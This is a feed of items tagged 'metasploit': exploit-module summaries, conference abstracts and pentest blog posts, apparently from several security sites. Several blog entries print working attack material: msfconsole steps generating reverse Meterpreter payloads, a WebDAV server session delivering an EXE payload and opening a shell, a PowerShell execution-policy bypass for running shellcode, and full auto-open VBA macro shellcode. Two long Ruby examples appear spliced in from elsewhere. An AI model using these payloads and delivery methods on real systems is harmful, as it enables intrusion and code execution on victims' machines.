279 items tagged "metasploit"

16:48 » Carnal0wnage
Quick and dirty hack to export all your findings/host/services/etc and creds from your metasploit database
Normally you'd do this with a:
workspace myworkspace
db_export -f xml -a /path/to/file.xml
db_export -f pwdump -a /path/to/file.pwdump
This can be tedious if you want to spin down an instance with tons of workspaces on it. So I wrote a quick resource script to get it done. This takes a list of workspaces. I'm sure you can programmatically retrieve the workspaces but I didn't. Code below:

19:42 » Carnal0wnage
So I put this out on twitter but failed to document it for historical reasons/find it when I need it.
I was able to replace the PoC payload with the payload from Metasploit's web delivery and it worked just fine.
Original PoC here: https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302#file-backdoor-sct
Below we can see the replaced payload:

...and receiving the shell after running the command from the command line:

21:36 » Packet Storm Security Exploits
This Metasploit module abuses the "RunScript" procedure provided by the SOAP interface of Adobe InDesign Server to execute arbitrary VBScript (Windows) or AppleScript (OS X). The exploit drops the payload on the server, and it must be removed manually.

15:29 » Packet Storm Security Exploits
NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This Metasploit module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).

17:12 » Packet Storm Security Exploits
This Metasploit module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

21:17 » Packet Storm Security Exploits
This Metasploit module exploits a format string vulnerability in the lg_sprintf function as implemented in liblocal.dll on EMC Networker products. This Metasploit module exploits the vulnerability by using a specially crafted RPC call to the program number 0x5F3DD, version 0x02, and procedure 0x06. This Metasploit module has been tested successfully on EMC Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).

17:00 » SecuriTeam
Metasploit Framework is prone to a local privilege-escalation vulnerability.

12:43 » SecDocs
Authors: Matthew Weeks
Tags: vulnerability
Event: Black Hat DC 2011
Abstract: In hostile networks, most people hope their con kung-fu is good enough to avoid getting owned. But for everyone who has ever wanted to reverse the attack, not getting owned is not enough. We will see how it is often possible for the intended victim to not only confuse and frustrate the attacker, but actually trade places and own the attacker. This talk will detail vulnerabilities in security tools, how these vulnerabilities were discovered, factors increasing the number of vulnerable systems, how the exploits work, creating cross-platform payloads, and how to defend yourself whether attacking or counterattacking. The audience will be invited to participate as complete exploit code will be released and demonstrated against the Metasploit Framework itself.

8:36 » Packet Storm Security Exploits
This Metasploit module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will result in a new session when this succeeds. If the module is able to modify the service but does not have permission to start and stop the affected service, the attacker must wait for the system to restart before a session will be created.

16:56 » Packet Storm Security Exploits
Metasploit versions prior to 4.4 contain a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploit works by hard-linking these filenames to /etc/passwd, then sending a packet with a privileged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. This Metasploit module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.

6:45 » SecDocs
Authors: Chris Gates
Tags: web application, Metasploit
Event: Black Hat DC 2011
Abstract: In 2009, Metasploit released a suite of auxiliary modules targeting Oracle databases and attacking them via the TNS listener. This year let's beat up on...errr, security test Oracle, but do it over HTTP/HTTPS. Rather than relying on developers to write bad code, let's see what we can do with default content and various unpatched Oracle middleware servers that you'll commonly run into on penetration tests. We'll also re-implement the TNS attack against the isqlplus web portal with Metasploit auxiliary modules.

6:00 » Carnal0wnage
Quick post, since I mentioned it in the DerbyCon talk, to mention that Metasploit generates PowerShell and PowerShell .net (looks related to this) payloads.
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf payload(reverse_https) > set LPORT 443
LPORT => 443
msf payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf payload(reverse_https) >
Generates it based on old powersploit code here. Also a note to mention the 64 bit business I mentioned here still applies. If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.

PowerShell version

PowerShell .net version

17:04 » Packet Storm Security Exploits
This Metasploit module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and, when triggered with a call to NtQueryIntervalProfile, will execute shellcode. This Metasploit module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring its own token to avoid causing system instability.

8:30 » Packet Storm Security Exploits
This Metasploit module exploits a vulnerability within the XGO.ocx ActiveX Control installed with the HP Application Lifecycle Manager Client. The vulnerability exists in the SetShapeNodeType method, which allows the user to specify, through the node parameter, memory that will be used as an object. This allows control of the dereference and use of a function pointer. This Metasploit module has been successfully tested with HP Application Lifecycle Manager 11.50 and requires JRE 6 in order to bypass DEP and ASLR.

20:52 » Packet Storm Security Exploits
This Metasploit module abuses the "Command" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID "0" is used; if that does not work, the Node ID is leaked from the error message and exploitation is retried. According to the vendor, versions prior to 1.6.9 are vulnerable. The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.

19:55 » Packet Storm Security Exploits
This Metasploit module exploits a command injection vulnerability found in E-Mail Security Virtual Appliance. This Metasploit module abuses the learn-msg.cgi file to execute arbitrary OS commands without authentication. This Metasploit module has been successfully tested on the ESVA_2057 appliance.

17:41 » Packet Storm Security Exploits
Nmap's man page mentions that "Nmap should never be installed with special privileges (e.g. suid root) for security reasons." and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This Metasploit module abuses a setuid nmap binary by writing out a Lua NSE script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.

15:15 » Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.

14:42 » Packet Storm Security Recent Files
metaSSH is a session plugin for Metasploit that gives you a meterpreter-like interface over an SSH connection. The author originally wrote this code so they could cleanly reverse pivot over SSH from within Metasploit. Features include multi-channel, pivoting, post-exploitation module use, and more.

17:19 » Packet Storm Security Exploits
Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug which can further be leveraged to insert user-controlled data resulting in potential escalation of privileges. Metasploit module included.

11:22 » Packet Storm Security Exploits
This Metasploit module attempts to authenticate using a hard-coded backdoor password in the Simatic S7-300 PLC and dumps the device memory using system commands.

16:13 » Packet Storm Security Exploits
This Metasploit module abuses a metacharacter injection vulnerability in the diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary commands as the www-data user account.

6:00 » Carnal0wnage
Metasploit comes with a dllhijacker module. The current module does not allow you to download exes; in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a WebDAV server has been a request for a while, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.

So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify; if not, generate an executable based on the payload options (yes, I realize AV will essentially make this part useless).
The below is a "show options" with nothing set; the default is to generate an EXE payload. If you want to set your own local EXE you need to set LOCALEXE to TRUE.
msf exploit(webdav_file_server) > show options

Module options (exploit/windows/dev/webdav_file_server):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  txt              yes       The list of extensions to generate
   LOCALEXE    false            yes       Use a local exe instead of generating one based on payload options
   LOCALFILE   myexe.exe        yes       The filename to serve up
   LOCALROOT   /tmp/            yes       The local file path
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH     /                yes       The URI to use (do not change).

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(webdav_file_server) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_file_server) > set LHOST 192.168.26.129
LHOST => 192.168.26.129
msf exploit(webdav_file_server) > set LPORT 5555
LPORT => 5555
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17904 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents
[*] 192.168.26.1:17904 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17904 PROPFIND /documents/
[*] 192.168.26.1:17904 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17904 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17904 GET => Delivering Generated EXE Payload
**Manually execute the exe**
[*] Sending stage (752128 bytes) to 192.168.26.1
[*] Meterpreter session 1 opened (192.168.26.129:5555 -> 192.168.26.1:17800) at Thu May 17 23:13:29 -0700 2012
Now if you want to serve a local exe
msf exploit(webdav_file_server) > jobs -K
Stopping all jobs...
[*] Server stopped.
msf exploit(webdav_file_server) > set LOCALEXE TRUE
LOCALEXE => TRUE
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents
[*] 192.168.26.1:17870 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17870 PROPFIND /documents/
[*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
I've tested this on Windows 7 and Windows XP, and I've been told this works with IE7 and below but not IE8. I've just been executing it on the command line.
Usage*:
copy \\ip\documents\myexe.exe myexe.exe
You may have to net use first:
net use \\ip\documents\ /User:Guest
You'll see Windows attempt the request over SMB, fail, then fall back to WebDAV (the WebClient service talking HTTP to port 80, which is why SRVPORT is marked "do not change").
Once the bin is on the box you can exec the bin manually.
*There are a couple of other ways to run this; the guy that asked me to help with all this will have a post on it soon.
Code is HERE in the github repo, be gentle, I don't usually do exploit code...
-CG
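The request sequence in the log above (OPTIONS, PROPFIND on the file, 301 on the share without a trailing slash, 207 on the directory, then GET) is the WebClient fallback doing its discovery before it copies the file. The following is an added example, not the module code from the post: a minimal dispatcher that reproduces that exchange and the LOCALEXE switch between a local file and a generated payload. WebDavFileServer, BLACKLIST and the placeholder generator are assumptions; the real module builds its EXE with Metasploit's payload generator, which is replaced here by a bare "MZ" prefix.

```ruby
# Added example (not the Carnal0wnage module): minimal WebDAV dispatcher for the
# OPTIONS -> PROPFIND -> GET sequence the Windows WebClient performs, with the
# LOCALEXE switch. Class name, BLACKLIST and placeholder_exe are assumptions.
class WebDavFileServer
  DEFAULTS = {
    'SHARENAME' => 'documents',
    'LOCALEXE'  => false,
    'LOCALFILE' => 'myexe.exe',
    'LOCALROOT' => '/tmp/',
  }.freeze
  # Extensions never served. The stock dll_hijacker module listed exe here;
  # the post removes it, so only dll is left in this example.
  BLACKLIST = %w[dll].freeze
  XML = { 'Content-Type' => 'text/xml; charset="utf-8"' }.freeze
  BIN = { 'Content-Type' => 'application/octet-stream' }.freeze

  def initialize(opts = {}, generator = nil)
    @opts = DEFAULTS.merge(opts)
    @generate = generator || -> { self.class.placeholder_exe }
  end

  def share_path
    "/#{@opts['SHARENAME']}"
  end

  def file_path
    "#{share_path}/#{@opts['LOCALFILE']}"
  end

  # Dispatch one request. Returns [status, headers, body, log]; `log` mimics
  # the lines the module prints in the post.
  def handle(method, path)
    case method
    when 'OPTIONS'  then options(path)
    when 'PROPFIND' then propfind(path)
    when 'GET'      then get(path)
    else [405, {}, '', "#{method} #{path} => 405"]
    end
  end

  # Stand-in for the framework's EXE generator: only a DOS "MZ" prefix.
  def self.placeholder_exe
    'MZ'.b + ("\x00".b * 62)
  end

  private

  # Advertising DAV class 1 is what lets the WebClient service treat the UNC
  # path as a WebDAV share once the SMB attempt has failed.
  def options(path)
    [200, { 'DAV' => '1', 'Allow' => 'OPTIONS, GET, PROPFIND' }, '', "OPTIONS #{path}"]
  end

  def propfind(path)
    if path == share_path
      [301, { 'Location' => "#{share_path}/" }, '', "PROPFIND => 301 (#{path})"]
    elsif path == "#{share_path}/"
      [207, XML, multistatus(path, true), "PROPFIND => 207 Directory (#{path})"]
    elsif path == file_path
      [207, XML, multistatus(path, false), "PROPFIND => 207 File (#{path})"]
    else
      [404, {}, '', "PROPFIND => 404 (#{path})"]
    end
  end

  def get(path)
    return [404, {}, '', "GET => 404 (#{path})"] unless path == file_path
    ext = File.extname(path).delete('.').downcase
    return [403, {}, '', "GET => 403 blacklisted .#{ext}"] if BLACKLIST.include?(ext)

    if @opts['LOCALEXE']
      # File.basename keeps a traversal-style LOCALFILE inside LOCALROOT.
      local = File.join(@opts['LOCALROOT'], File.basename(@opts['LOCALFILE']))
      return [404, {}, '', "GET => 404 missing #{local}"] unless File.file?(local)
      [200, BIN, File.binread(local), "GET => Delivering Local EXE Payload [ #{local} ]"]
    else
      [200, BIN, @generate.call, 'GET => Delivering Generated EXE Payload']
    end
  end

  # Minimal RFC 4918 multistatus body: href plus resourcetype is enough for
  # the WebClient to tell a directory from a file.
  def multistatus(href, collection)
    type = collection ? '<D:collection/>' : ''
    <<~BODY
      <?xml version="1.0" encoding="utf-8"?>
      <D:multistatus xmlns:D="DAV:">
        <D:response>
          <D:href>#{href}</D:href>
          <D:propstat>
            <D:prop><D:resourcetype>#{type}</D:resourcetype></D:prop>
            <D:status>HTTP/1.1 200 OK</D:status>
          </D:propstat>
        </D:response>
      </D:multistatus>
    BODY
  end
end
```

Drop the dispatcher behind any HTTP listener and log the fourth element of each result; the sequence of log lines for a `copy \\host\documents\myexe.exe` then matches the module output above, ending in either "Delivering Generated EXE Payload" or "Delivering Local EXE Payload" depending on LOCALEXE.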
-
-
22:19
»
Packet Storm Security Exploits
This archive includes two exploits, one Metasploit and one not, for the Gimp Script-Fu buffer overflow that affects version 2.6.11.
-
-
7:58
»
Carnal0wnage
This is a quick blog post based on my slides from the May 2012 NovaHackers Meeting.
Two posts got me started looking at PowerShell and its ability to execute shellcode:
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
and
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html
The first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. yay!

The second post talks about doing something more than calc.exe... getting shell, whooo hooooo.
You can review the code, but it only shows x86/32-bit shellcode. This will fail miserably on x64.

I initially thought it would be an easy fix: just grab an x64 payload from MSF. Problem is there are no x64 http/https payloads...

CG was a sad panda.

This left me with two options:
Suck it up and use an existing x64 payload (like reverse_tcp) or just pop calc.exe to prove how awesome I am during pentests
or
Invoke 32-bit PowerShell and run 32-bit shellcode (now we get http/https payloads)
So googling turned up a way to tell PowerShell to use the x86 version even on x64. The solution I used was here:
http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx
You will need to set the execution policy for v1.0 PowerShell, or possibly try a bypass technique.
I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if it's not x86 and re-runs the script, and therefore the shellcode, under the x86 PowerShell from SysWOW64. You'll have to set the execution policy for it first.
[Byte[]]$sc = $sc32
# 64-bit PowerShell reports AMD64 here; 32-bit shellcode has to run in the WOW64 (x86) host
if ($env:Processor_Architecture -ne "x86")
{
    write-warning "WTF! This is 64x, switching to 32x and continuing script."
    # -executionpolicy must come before -file: everything after -file is passed to the script as arguments
    &"$env:windir\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file $myinvocation.Mycommand.path
    exit
}
Now it works.

Remember that you have to migrate out of the PowerShell process. Much like the Office macro and shellcodeexec cases, if the user closes Office, or you close or exit the PowerShell process, the shell goes bye-bye.
References:
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html
http://www.exploit-monday.com/2011/11/powersyringe-powershell-based-codedll.html
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
http://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html
http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx
-
-
5:00
»
Carnal0wnage
Post [7] HTTP PUT/WebDAV/SEARCH

Man I love mis-configured WebDAV; I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, it's *usually* not writable, but it occurs often enough that you really have to check it each time you see it.
LOW?

IIS5 is awesome (not) because WebDAV is enabled by default but the web root is not writable. Wait, who still runs Windows 2000?! I know, I know: the app can't be rewritten... accepted risk... blah blah... no one will ever use this to pwn my network... it's OK if that DA admin script logs into it daily...
The "game" is finding the writable directory (if one exists) on the WebDAV-enabled server.
*Dirbusting and Ruby FTW*
I find that it's usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help; Nessus will actually tell you the methods allowed per directory. Still a challenge though.
Once you have a directory you want to test you can use cadaver to test manually, davtest, or Ryan Linn's Metasploit module for testing WebDAV.

I've also done some posts on WebDAV in the past:
http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html
http://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.html
hdm had done a post on it in the past in relation to the ASP payload; I can't find it on the R7 site but it's mirrored here:
http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.html
Decent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdf
HTTP PUT
HTTP PUT/SEARCH usually gets rolled into

Web scanners are better about alerting on PUT as an available method, and most will attempt the PUT for you. I don't think any vuln scanners do; I'm sure someone will correct me if I'm wrong.
Writable HTTP PUT is rare (at least for me), although some friends say they see it all the time.
Metasploit has a module to test for PUT functionality as well:
http://www.metasploit.com/modules/auxiliary/scanner/http/http_put
HTTP SEARCH
HTTP SEARCH can be fun. When enabled, it will give you a listing of every file in the webroot.
Mubix did a post on it:
http://www.room362.com/blog/2011/8/26/iis-search-verb-directory-listing.html
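The per-directory hunt described in this post (OPTIONS to see what the server advertises, then actually trying a PUT, because an advertised method and a writable directory are two different things) is simple enough to script. The following is an added example, not code from the post or from cadaver, davtest or the Metasploit modules it links: it probes a list of candidate directories, PUTs a harmless marker file, reads it back to confirm the write, and deletes it again. The transport is a callable so the same logic runs over Net::HTTP against a real host or over the constructed FakeServer below; DavProbe, FakeServer and the marker filename are assumptions.

```ruby
# Added example, not from the post or the tools it links: find the writable
# WebDAV/PUT directory by trying a marker file per directory. DavProbe,
# FakeServer and the davtest_ filename prefix are assumptions.
require 'net/http'
require 'securerandom'

class DavProbe
  Result = Struct.new(:dir, :allowed, :writable, :note)
  OK_PUT = [200, 201, 204].freeze

  # transport.call(method, path, body) -> [status, headers, body]
  def initialize(transport)
    @transport = transport
  end

  # Methods advertised in the Allow header; what Nessus reports per directory.
  def allowed_methods(dir)
    status, headers, _body = @transport.call('OPTIONS', dir, nil)
    return [] unless status == 200
    (headers['Allow'] || headers['allow'] || '').split(',').map { |m| m.strip.upcase }
  end

  def probe(dir)
    dir += '/' unless dir.end_with?('/')
    allowed = allowed_methods(dir)
    return Result.new(dir, allowed, false, 'PUT not advertised') unless allowed.include?('PUT')

    # A .txt marker proves write access without dropping a script handler
    # (.asp/.php) on the box; a random name avoids clobbering anything real.
    name   = "#{dir}davtest_#{SecureRandom.hex(4)}.txt"
    marker = "webdav write test #{SecureRandom.hex(8)}"
    status, _headers, _body = @transport.call('PUT', name, marker)
    return Result.new(dir, allowed, false, "PUT => #{status}") unless OK_PUT.include?(status)

    # Advertised PUT that returns 2xx can still be a lie; read the file back.
    status, _headers, body = @transport.call('GET', name, nil)
    ok = status == 200 && body == marker
    @transport.call('DELETE', name, nil) # clean up whatever the readback said
    Result.new(dir, allowed, ok, ok ? 'PUT confirmed via GET' : "GET readback failed (#{status})")
  end

  def scan(dirs)
    dirs.map { |d| probe(d) }
  end

  # Transport over Net::HTTP for a live target (not used by the offline run).
  def self.http_transport(host, port = 80)
    lambda do |method, path, body|
      req = Net::HTTPGenericRequest.new(method, !body.nil?, true, path)
      req.body = body if body
      res = Net::HTTP.new(host, port).request(req)
      [res.code.to_i, res.to_hash.transform_values(&:first), res.body.to_s]
    end
  end
end

# Constructed stand-in for an IIS-style host: the web root advertises PUT but
# refuses it, /images/ is read-only, and /uploads/ is the writable directory.
class FakeServer
  attr_reader :files

  def initialize
    @files = {}
    @allow = { '/'         => 'OPTIONS, GET, HEAD, PUT, PROPFIND',
               '/images/'  => 'OPTIONS, GET, HEAD, PROPFIND',
               '/uploads/' => 'OPTIONS, GET, HEAD, PUT, DELETE, PROPFIND' }
  end

  def call(method, path, body)
    dir = path[0..path.rindex('/')]
    case method
    when 'OPTIONS' then @allow[dir] ? [200, { 'Allow' => @allow[dir] }, ''] : [404, {}, '']
    when 'PUT'     then dir == '/uploads/' ? (@files[path] = body; [201, {}, '']) : [403, {}, '']
    when 'GET'     then @files.key?(path) ? [200, {}, @files[path]] : [404, {}, '']
    when 'DELETE'  then @files.delete(path) ? [204, {}, ''] : [404, {}, '']
    else [405, {}, '']
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  DavProbe.new(FakeServer.new).scan(['/', '/images/', '/uploads/']).each do |r|
    puts "#{r.dir.ljust(10)} writable=#{r.writable} allow=#{r.allowed.join(',')} (#{r.note})"
  end
end
```

Feed it the directory list from your dirbusting run via `DavProbe.new(DavProbe.http_transport(host)).scan(dirs)`; only directories whose note reads "PUT confirmed via GET" are worth the .asp/.php follow-up, and the DELETE keeps the marker files off the target whatever the outcome.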
-
-
13:36
»
Packet Storm Security Exploits
This Metasploit module exploits FreePBX versions 2.10.0, 2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code into the '$channel' variable in the function callme_startcall in order to gain remote code execution. Please note that in order to use this module properly you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voicemail). Tested on both Elastix and FreePBX ISO image installs.
-
-
22:45
»
Packet Storm Security Misc. Files
Whitepaper called Metasploit: Low Level View. It touches on topics such as code injection and malware detection evasion / Metasploit encoders.
-
-
14:21
»
Carnal0wnage
scriptjunkie recently had a post on
Direct shellcode execution in MS Office macros. I didn't see it go into the Metasploit trunk, but it's there. How to generate the macro code is in the post, but I'll repost it here so I don't have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit the Visual Basic button to change the code around.
msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf
Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#EndIf
Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The important thing to remember is that with this method you'll NOT be dropping a .vbs or a binary, and you'll be running inside of Excel/Word/whatever, so you need to set up an autorunscript or macro to migrate out of the process; otherwise you'll lose the shell as soon as they exit the Office application.
-
-
17:08
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument and passes it on to ShellExecuteW(), which allows a malicious attacker to execute any process that is on the local system. However, if the victim machine is connected to a remote share (or something similar), then it is also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detected by McAfee; any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.
-
-
-
7:41
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack-based buffer overflow in the ActiveX control ImageViewer2.OCX by passing an overly long argument to the insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This Metasploit module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.
-
-
-
7:50
»
Packet Storm Security Exploits
This Metasploit module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. Versions 1.9.6 through 2.2.10 are affected.
-
-
-
22:26
»
Packet Storm Security Exploits
This is the full Daytona package that houses three remote JBoss exploits with authentication bypass. They are ported from Metasploit and beefed up with two scanners.
-
-
-
7:36
»
Packet Storm Security Recent Files
Whitepaper called Using QR Tags to Attack Smart Phones (Attaging). It discusses the threatscape related to arbitrary scanning of these tags and using Metasploit to exploit them.
-
-
0:24
»
SecDocs
Authors: Max Moser, Philipp Schrödel
Tags: web application, web, Metasploit
Event: Hashdays 2010
Abstract: The talk introduces our new open source extension for the well-known Metasploit Framework, called CARAT. It uses Metasploit's Meterpreter technology to communicate between the client (the target to be scanned) and the server (the Metasploit server running the CARAT plugin), execute commands and consolidate the results. By introducing client-specific job scheduling to Metasploit, CARAT is a framework for automated configuration validation, security assessments and functional testing of components and applications. In contrast to a lot of other available frameworks, CARAT's architecture is as simple as possible, which allows its users a great amount of flexibility.
-
-
18:07
»
Packet Storm Security Exploits
EZ-ShoPwner version 0.1 is a pwning tool for EZ-Shop. It allows an attacker to extract various data from the database and spawns shells through netcat and Metasploit.
-
-
-
13:14
»
Packet Storm Security Exploits
This Metasploit module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a Linux kernel and initrd into memory that reads the hard drive, placing the payload on any Windows partition seen, and adds a uid 0 user with username and password metasploit to any Linux partition seen.
-
-
-
18:20
»
Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
-
-
6:40
»
